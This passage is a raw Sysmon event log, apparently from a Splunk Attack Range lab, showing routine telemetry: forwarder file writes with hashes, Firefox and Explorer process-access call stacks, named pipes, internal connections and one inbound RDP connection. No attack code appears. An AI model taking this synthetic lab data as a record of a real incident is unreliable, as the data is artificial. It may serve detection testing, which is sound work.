(0x01d776f2-0x5f882efc) 13241300x80000000000000001047660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0xc14c96fc) 354300x80000000000000001047659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.403{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50977-false10.0.1.12-8089- 23542300x80000000000000001047676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.653{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEC995D73A4B834F78BA6F722402FC57,SHA256=6F2A0FA39C664A7B98EAE533BEACB59B7D2BD4F35BB59C0129D7A36EA990610A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:00.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46A7B211C7A36310EC764BEAC02FED94,SHA256=CCF4D2E8D9DBCD7DBF1BA246E8424AC1C284B425ACA4ED5D966155FC3DEFEA7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001047674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001047673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001047672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001047671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6651e3.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:01.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A60191D34D354DC5F9560042B03FDD7D,SHA256=D7C3419A6732F9B4B3A1C884783FA2BE667B26878B9D1A99565CE5C57BF88FE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:01.469{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F59F7BD38EF1F2F6977D39543F18AC0B,SHA256=C5CB87997182C95A92DEA94527D403046DD9BC25157C66F363231D3553C2DA1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:01.601{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:01.601{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
354300x80000000000000001047677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.601{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50978-false10.0.1.12-8000- 23542300x80000000000000001047681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:02.699{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5644408403DBC1D7D899809EEC1F9C,SHA256=3DB53578530B6431834C21D30415561C69DE3142B41DD60D1352D3EC12763BBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:02.485{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E229358CFA231A95AB48B91506750AF0,SHA256=CAD07B151610BD3EC50C8BB0389CDE4E70A8986B34EBC43D4A6369547DC19FAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:02.352{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57222-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:03.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C515D2DD2F6E8DD2D849D7F6975AF34,SHA256=90665A352FFA6E0DACF72B14915832DCFCAFA78CA9AEB398F09569F6AC28EE85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:03.736{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D13361760D6428E68C6B8725B673BFC,SHA256=86BA8320312C84073702EBA1DDE1F3BD1D0DDF9FAED643368847D52ABBB960E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.751{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=568C5BF05CF10BB60FE1EC52806F8937,SHA256=F28D966B7CD3112FA77A5C769DAEEB0A41FD3F9AC3A2D58FB9AD94F2F84FABB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:04.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6F1EAC8DA998F39D14D6CA8FB24D5D,SHA256=51E7DEDBA027FF6D3CB460173F32831CF9B8077E8FB2C6BC30773F0549F4FDD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:05.751{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D80AFA9BA41DC8FB5293D36000379618,SHA256=A19A72B22AC6AFBDFB21E67EDAF2D9EA6DE19231937D3A69E25E3F35314E5A4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:05.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ED9EEB5EA99F0F0253011651D9FAA42,SHA256=2A37F9C1FB0401BD6ACCE0B88B89043061F1F2860621FC11000EBA0DB1981C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:05.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAB12540C99F51C025E0BA0A5C826BAF,SHA256=C3E1F2C12A9ED8C3A442E4ACB127BE6CFA8062624953E75E20F5C3630A81DE3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:04.031{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-16976-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:05.641{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CFA3C63AD9E4A43BC20694984E82B81,SHA256=5940B6AB059ED1DD41C803BBD68DF778C8376130B1134732C290D9C1EA32D20A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:56.786{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50979-false10.0.1.12-8000- 23542300x80000000000000001047691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1035CB32845CB25A58036E9AD73E3CD,SHA256=3B556D1AA0F769F53B9D2EC2FE9DC9D6C3D645653EC3EB25C837B10FB1845D34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:04.899{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57223-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:06.657{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D245B885A5E41C406E5CF409CD54D8F2,SHA256=CD2808DD72CCB2D3DADCEFFF11B6452D574D35307E956BF198C84A3DFB31FA3D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.199{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.152{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 
10341000x80000000000000001047688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.152{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001047687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:49:06.152{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1212.197617904C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001047686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:49:06.152{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1212.197617904C:\Program Files\Mozilla Firefox\firefox.exe 
23542300x8000000000000000806968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:07.657{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF044E3E24E3C61D37B511F3315D554F,SHA256=5DEA6BAD96980A291FAADE81CC85463E4638F2CDA68356EEC2D438CB336D56E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:07.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311DBBB2682952A0318FC90F69342B5B,SHA256=CD8DA57B16C224D4FD5FEF06B9F682952E516B0CBF6D5E29DE33BCD2055336E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:58.297{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57223-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001047708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=241010D53FF084E5DBB267C6F23ABA86,SHA256=D2E4329606EEECC766C5D4B4B7F098EE7B207E3CA35FD5A81B96267D15CC6A57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:08.704{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD815E83FEB8B8AAFAE3F087C3F1F4C1,SHA256=56C482DD3D16BC74B4B06EAA9C0B2C15914D6C6A05B191EAD16274BB314CF8F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.283{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.283{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.283{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 